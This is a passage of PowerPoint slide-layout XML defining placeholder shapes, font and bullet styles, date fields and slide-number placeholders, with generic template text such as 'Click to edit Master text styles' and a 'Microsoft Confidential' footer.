              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit slide content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>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36" tIns="91436">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="32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dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2083596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36" tIns="91436">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500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="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36" tIns="91436">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="32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dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="681584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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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70" tIns="137154">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500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="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70" tIns="137154">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="32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dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11269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70" tIns="137154" rIns="91436"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36" tIns="45718">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="19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80"/>
            <a:ext cx="2844800" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0EE9BFCC-D252-47FD-89D5-759803DE72EA}" type="datetime1">
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/1/2020</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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9" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8850629" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA8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726689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70" tIns="137154" rIns="91436"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80"/>
            <a:ext cx="2844800" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FCF7DBEB-E62F-4B69-BA79-A6BC05804045}" type="datetime1">
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/1/2020</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1143000"/>
            <a:ext cx="7010400" cy="4953000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91436" tIns="45718">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="228589" marR="0" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="1900" kern="1200" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685766" marR="0" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="1900" kern="1200" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1142942" marR="0" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="1900" kern="1200" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600120" marR="0" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="1900" kern="1200" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057298" marR="0" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="1900" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228589" marR="0" lvl="0" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="30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rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685766" marR="0" lvl="1" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="120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rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1142942" marR="0" lvl="2" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" kern="120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rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1600120" marR="0" lvl="3" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="30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rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2057298" marR="0" lvl="4" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" kern="120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rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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7" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8850629" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA8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857068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13" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8850629" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA8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1847963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900">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="3F3F3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0" y="1143000"/>
            <a:ext cx="3048000" cy="2286000"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="0A5BBA"/>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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6492880"/>
            <a:ext cx="2844800" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1BE62DDC-A436-4067-8CF5-500F9D1E44C5}" type="datetime1">
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/1/2020</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13"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14" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8850629" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA8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1323274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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6492880"/>
            <a:ext cx="2844800" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F5730584-F5E1-4F98-B3CF-558E22B0F9F1}" type="datetime1">
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/1/2020</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12"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3F3F3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8850629" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA8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4884531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fld id="{D3E7A8D3-CCA4-42F5-B91A-0DA8F99CB4D1}" type="datetime1">
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>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5/1/2020</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
